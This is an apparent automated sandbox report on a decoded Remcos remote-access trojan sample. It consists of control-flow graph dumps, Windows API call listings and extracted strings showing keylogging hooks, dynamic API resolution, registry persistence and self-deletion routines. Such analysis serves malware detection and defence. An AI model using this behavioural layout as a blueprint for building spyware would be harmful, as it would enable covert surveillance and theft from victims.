47626 440c61 26 API calls 47625->47626 47627 41ad77 47626->47627 47628 401f66 28 API calls 47627->47628 47629 409a31 47628->47629 47630 404c9e 28 API calls 47629->47630 47630->47618 47632 409e5d Sleep 47631->47632 47651 409d97 47632->47651 47634 4099b2 47635 409e9d 
CreateDirectoryW 47639 409e6f 47635->47639 47636 409eae GetFileAttributesW 47636->47639 47637 401d64 28 API calls 47637->47639 47638 409ec5 SetFileAttributesW 47638->47639 47639->47632 47639->47634 47639->47635 47639->47636 47639->47637 47639->47638 47642 409f10 47639->47642 47664 41b59f 47639->47664 47641 409f3f PathFileExistsW 47641->47642 47642->47641 47644 401f86 28 API calls 47642->47644 47645 40a048 SetFileAttributesW 47642->47645 47646 406052 28 API calls 47642->47646 47647 401eef 26 API calls 47642->47647 47648 401eea 26 API calls 47642->47648 47650 401eea 26 API calls 47642->47650 47673 41b62a 32 API calls 47642->47673 47674 41b697 CreateFileW SetFilePointer WriteFile CloseHandle 47642->47674 47644->47642 47645->47639 47646->47642 47647->47642 47648->47642 47650->47639 47652 409e44 47651->47652 47655 409dad 47651->47655 47652->47639 47653 409dcc CreateFileW 47654 409dda GetFileSize 47653->47654 47653->47655 47654->47655 47656 409e0f CloseHandle 47654->47656 47655->47653 47655->47656 47657 409e21 47655->47657 47658 409e04 Sleep 47655->47658 47659 409dfd 47655->47659 47656->47655 47657->47652 47661 4082dc 28 API calls 47657->47661 47658->47656 47675 40a7f0 83 API calls 47659->47675 47662 409e3d 47661->47662 47663 4098a5 126 API calls 47662->47663 47663->47652 47665 41b5b2 CreateFileW 47664->47665 47667 41b5eb 47665->47667 47668 41b5ef 47665->47668 47667->47639 47669 41b606 WriteFile 47668->47669 47670 41b5f6 SetFilePointer 47668->47670 47671 41b61b CloseHandle 47669->47671 47672 41b619 47669->47672 47670->47669 47670->47671 47671->47667 47672->47671 47673->47642 47674->47642 47675->47658 47678 402d97 47677->47678 47681 4030f7 47678->47681 47680 402dab 47680->47508 47682 403101 47681->47682 47684 403115 47682->47684 47685 4036c2 28 API calls 47682->47685 47684->47680 47685->47684 47687 403b48 47686->47687 47693 403b7a 47687->47693 47690 403cbb 47697 403dc2 47690->47697 47692 403cc9 47692->47166 47694 403b86 47693->47694 47695 403b9e 28 API calls 47694->47695 
47696 403b5a 47695->47696 47696->47690 47698 403dce 47697->47698 47701 402ffd 47698->47701 47700 403de3 47700->47692 47702 40300e 47701->47702 47703 4032a4 28 API calls 47702->47703 47704 40301a 47703->47704 47706 40302e 47704->47706 47707 4035e8 28 API calls 47704->47707 47706->47700 47707->47706 47714 4395ca 47708->47714 47712 412814 47711->47712 47713 4127ed RegSetValueExA RegCloseKey 47711->47713 47712->47191 47713->47712 47717 43954b 47714->47717 47716 401608 47716->47189 47718 43955a 47717->47718 47719 43956e 47717->47719 47725 445364 20 API calls __dosmaperr 47718->47725 47724 43956a __alldvrm 47719->47724 47727 447611 11 API calls 2 library calls 47719->47727 47721 43955f 47726 43a837 26 API calls _Deallocate 47721->47726 47724->47716 47725->47721 47726->47724 47727->47724 47731 41aac9 ctype ___scrt_fastfail 47728->47731 47729 401f66 28 API calls 47730 41ab3e 47729->47730 47730->47195 47731->47729 47732->47211 47734 413fb3 getaddrinfo WSASetLastError 47733->47734 47735 413fa9 47733->47735 47734->47261 47871 413e37 35 API calls ___std_exception_copy 47735->47871 47737 413fae 47737->47734 47739 404206 socket 47738->47739 47740 4041fd 47738->47740 47742 404220 47739->47742 47743 404224 CreateEventW 47739->47743 47872 404262 WSAStartup 47740->47872 47742->47261 47743->47261 47744 404202 47744->47739 47744->47742 47746 4049b1 47745->47746 47747 40492a 47745->47747 47746->47261 47748 404933 47747->47748 47749 404987 CreateEventA CreateThread 47747->47749 47750 404942 GetLocalTime 47747->47750 47748->47749 47749->47746 47874 404b1d 47749->47874 47751 41ad56 28 API calls 47750->47751 47752 40495b 47751->47752 47873 404c9e 28 API calls 47752->47873 47754 404968 47755 401f66 28 API calls 47754->47755 47756 404977 47755->47756 47757 41a696 79 API calls 47756->47757 47758 40497c 47757->47758 47759 401eea 26 API calls 47758->47759 47759->47749 47761 4043e1 47760->47761 47762 4042b3 47760->47762 47763 4043e7 WSAGetLastError 47761->47763 47764 404343 47761->47764 
                                        [Graph edge list omitted; this span is the tail of the rendered execution graph (node ids 47238-48222, basic blocks 401d64-448716). Windows API calls that appear on the graph nodes in this span: CreateEventW, CreateEventA, CreateThread, WaitForSingleObject, CloseHandle, SetEvent, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GlobalMemoryStatusEx, GetForegroundWindow, GetWindowTextW, GetTickCount, GetLastInputInfo, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, GetCurrentProcessId, TerminateProcess, TerminateThread, ExitProcess, Sleep, GetModuleFileNameW, RegDeleteKeyA, SetFileAttributesW, DeleteFileW, RemoveDirectoryW, ShellExecuteW, UnhookWindowsHookEx, GetLastError, SetLastError; CRT helpers _strftime, _free, __dosmaperr, ___scrt_fastfail, ___std_exception_copy, pre_c_initialization, _Atexit.]

                                        Control-flow Graph

                                        APIs
                                        • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                        • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                        • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                        • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                        • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                        • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                        • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE29
                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE73
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleLibraryLoadModule
                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                        • API String ID: 384173800-625181639
                                        • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                        • Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
                                        • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                        • Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE

                                        Control-flow Graph

                                        [Rendered graph omitted; the edge list covers basic blocks 40d767-40e154 of this function. Windows API calls that appear on the graph nodes: GetModuleFileNameW, CreateThread (several sites), StrToIntA, SetProcessDEPPolicy, DeleteFileW, Sleep.]
                                        APIs
                                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe,00000104), ref: 0040D790
                                          • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                        • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-IUHLZ9$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                        • API String ID: 2830904901-2533174582
                                        • Opcode ID: dbcf892a0b8a795771d979b43a87f7b46ac64dc1d8763980b6969b44d710bdae
                                        • Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
                                        • Opcode Fuzzy Hash: dbcf892a0b8a795771d979b43a87f7b46ac64dc1d8763980b6969b44d710bdae
                                        • Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                        Control-flow Graph

                                        [Rendered graph omitted; the edge list covers basic blocks 4099e4-409a96 of this function. Windows API calls that appear on the graph nodes: SetWindowsHookExA, GetLastError, GetMessageA, TranslateMessage, DispatchMessageA.]
                                        APIs
                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                        • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                        • GetLastError.KERNEL32 ref: 00409A1B
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                        • TranslateMessage.USER32(?), ref: 00409A7A
                                        • DispatchMessageA.USER32(?), ref: 00409A85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                        • String ID: Keylogger initialization failure: error $`Wu
                                        • API String ID: 3219506041-303027793
                                        • Opcode ID: 1c1c47e8679d2b224dd733d0129ac0d0ac4193f5d3ce86d790f17fa939d258fc
                                        • Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
                                        • Opcode Fuzzy Hash: 1c1c47e8679d2b224dd733d0129ac0d0ac4193f5d3ce86d790f17fa939d258fc
                                        • Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                          • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                          • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                        • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                        • ExitProcess.KERNEL32 ref: 0040E672
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                        • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                        • API String ID: 2281282204-3981147832
                                        • Opcode ID: ef5e2cde1c6eacbd3823fb9ed910c6fe3935d25d8f4b30635bdf8653ba33eb6e
                                        • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                                        • Opcode Fuzzy Hash: ef5e2cde1c6eacbd3823fb9ed910c6fe3935d25d8f4b30635bdf8653ba33eb6e
                                        • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF
                                        APIs
                                        • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                        • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                        Strings
                                        • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Create$EventLocalThreadTime
                                        • String ID: KeepAlive | Enabled | Timeout:
                                        • API String ID: 2532271599-1507639952
                                        • Opcode ID: a36eacb2df50b02e654fe97b9ad9f3b4b14a6fc902c8466c71e8a12677958319
                                        • Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
                                        • Opcode Fuzzy Hash: a36eacb2df50b02e654fe97b9ad9f3b4b14a6fc902c8466c71e8a12677958319
                                        • Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
                                        APIs
                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                                        • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$AcquireRandomRelease
                                        • String ID:
                                        • API String ID: 1815803762-0
                                        • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                        • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                                        • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                        • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                                        APIs
                                        • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7CF
                                        • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Name$ComputerUser
                                        • String ID:
                                        • API String ID: 4229901323-0
                                        • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                        • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                        • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                        • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                        APIs
                                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: 2f0bd58ff2c46692be8fd04023cab22914861fe3b087e1ba55e03f3e1b92ba33
                                        • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                        • Opcode Fuzzy Hash: 2f0bd58ff2c46692be8fd04023cab22914861fe3b087e1ba55e03f3e1b92ba33
                                        • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: recv
                                        • String ID:
                                        • API String ID: 1507349165-0
                                        • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                        • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                        • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                        • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
